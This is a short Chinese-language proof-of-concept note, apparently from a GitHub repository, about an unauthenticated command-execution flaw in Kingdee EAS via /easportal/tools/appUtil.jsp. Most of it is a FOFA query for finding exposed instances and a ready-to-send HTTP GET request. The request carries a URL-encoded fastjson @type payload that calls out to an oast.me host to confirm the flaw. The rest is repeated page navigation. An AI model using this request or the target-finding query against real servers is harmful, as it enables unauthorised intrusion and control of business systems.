金蝶EAS存在appUtil.jsp命令执行漏洞

金蝶EAS和金蝶EAS Cloud在多个版本中存在文件上传漏洞，未经授权的攻击者可以通过特制的请求包或上传恶意的webshell文件，从而进行远程代码执行，控制服务器。

fofa

app="Kingdee-EAS"

poc

GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22csbs1ru8ki46d67eiob0ywz51btedcjtj.oast.me%22%7D%7D HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate

漏洞来源

https://mp.weixin.qq.com/s/g7XvKIKPQf35z4IPt5i8iA

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

金蝶EAS存在appUtil.jsp命令执行漏洞.md

金蝶EAS存在appUtil.jsp命令执行漏洞.md

金蝶EAS存在appUtil.jsp命令执行漏洞

fofa

poc

漏洞来源

Files

金蝶EAS存在appUtil.jsp命令执行漏洞.md

Latest commit

History

金蝶EAS存在appUtil.jsp命令执行漏洞.md

File metadata and controls

金蝶EAS存在appUtil.jsp命令执行漏洞

fofa

poc

漏洞来源